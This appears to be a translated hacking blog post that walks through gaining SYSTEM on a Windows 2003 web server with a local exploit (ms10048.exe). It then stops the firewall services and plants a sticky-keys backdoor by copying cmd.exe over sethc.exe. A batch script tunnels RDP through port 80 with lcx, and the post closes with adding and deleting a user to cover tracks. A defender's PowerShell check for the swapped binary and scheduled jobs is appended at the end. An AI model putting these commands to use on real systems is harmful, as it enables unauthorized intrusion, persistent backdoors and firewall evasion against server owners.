Breaking through ACL filtering for elevation of privilege

Source: Internet
Author: User

One day a friend gave me access to a website and asked me to escalate privileges on it. After looking around: drives C: and D: were read-only, except that C:\Documents and Settings\All Users\Documents was writable. No FTP software or database was installed, Wscript.Shell was not disabled, and the terminal services port had been changed to 45678. I tried to connect to port 45678 from the Internet but could not reach it, and lcx could not forward it out either. I assumed it was the Windows Firewall or IPSEC. Either way, the first step was to get SYSTEM privileges so I could deal with the firewall.
Looking at the patches, MS08-067 appeared to be patched, so I uploaded ms10048.exe to the C:\Documents and Settings\All Users\Documents directory and ran ms10048 whoami, which returned nt authority\system, i.e. SYSTEM privileges. Next I turned off the firewall with net stop yyagent and net stop sharedaccess. Port 45678 still could not be reached, and, frustratingly, pinging an Internet IP address failed as well. Running tracert 220.181.6.175 (220.181.6.175 is Baidu's IP address) returned:
      1    <1 ms    <1 ms    <1 ms  203.171.236.1
      2     *        *        *     Request timed out.
      3     *        *        *     Request timed out.

The packets are dropped after passing through the router, so my preliminary conclusion was that an ACL had been configured on the router.
Scanning the target server showed only port 80 open, and the server's operating system was Windows 2003. Port multiplexing does not work on 2003, so it seemed I had to stop IIS and redirect port 45678 to port 80 instead.
In the C:\Windows directory, write a 1.bat with the following content:

    copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y
    rem replace sethc.exe; after logging on to the terminal, press Shift five times to open a CMD window
    net stop w3svc
    lcx.exe -tran 80 127.0.0.1 45678
    net start w3svc
    rem start IIS again if lcx crashes unexpectedly
Note, however, that this 1.bat cannot be run through ms10048.exe directly. Because the IIS process is the parent process of ms10048.exe, ms10048.exe exits automatically as soon as IIS stops, so the rest of the script never runs.
Run time /t to get the server time. ms10048.exe at 20:25 c:\windows\1.bat makes the server run 1.bat at 20:25, and a second ms10048.exe at 20:40 shutdown -r restarts the server at 20:40.
One or two minutes later, connect to port 80 of the server with Remote Desktop. Press SHIFT five times to bring up the CMD window, add a user, and log on successfully. After logging in, run at /delete /y to delete the scheduled restart task.
What to do next?
You could simply restart the server on your way out, but that is not good practice. Open a cmd window and run query user to find your session ID; mine is 2. Then, in the CMD window, enter taskkill /IM lcx.exe /F & logoff 2 & net user 410502 /del & net start w3svc. This command kills lcx.exe, logs off my session, deletes my user, and then starts IIS again.
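From the defender's side, the walkthrough above leaves two traces on the host: a sethc.exe that is really cmd.exe, and jobs scheduled with at.exe. The following check for both is an added example, not part of the original post; it assumes a default %SystemRoot% layout, PowerShell 4 or later for Get-FileHash, and that the genuine sethc.exe reports OriginalFilename 'sethc.exe' in its version resource.

```powershell
# Added defender check (not from the original post). Looks for the two
# host-side traces of the walkthrough above: sethc.exe replaced by cmd.exe
# and a pending scheduled job. Assumes a default %SystemRoot% layout.
$sys32 = Join-Path $env:SystemRoot 'System32'
$sethc = Join-Path $sys32 'sethc.exe'
$cmd   = Join-Path $sys32 'cmd.exe'

# 1. A swapped sethc.exe is byte-identical to cmd.exe, so the hashes match.
$sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
$cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash

# 2. Even a modified copy keeps cmd.exe's version resource; the genuine
#    accessibility binary reports OriginalFilename 'sethc.exe' (assumed).
$origName = (Get-Item -Path $sethc).VersionInfo.OriginalFilename

if ($sethcHash -eq $cmdHash) {
    Write-Warning "sethc.exe has the same SHA-256 as cmd.exe: $sethcHash"
} elseif ($origName -ne 'sethc.exe') {
    Write-Warning "sethc.exe version resource says OriginalFilename='$origName'"
} else {
    Write-Output 'sethc.exe: hash and version resource look genuine'
}

# 3. Jobs created with at.exe (here: run 1.bat, then shutdown -r) show up in
#    the scheduler; review anything pointing at a world-writable directory.
schtasks /query /fo LIST /v | Select-String -Pattern 'TaskName|Task To Run|Next Run Time'
```

Run it in an elevated PowerShell session; a match in step 1 or a foreign OriginalFilename in step 2 is a strong indicator that the sticky-keys binary was swapped.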

The Elevation of Privilege ends successfully.

By not losing memories
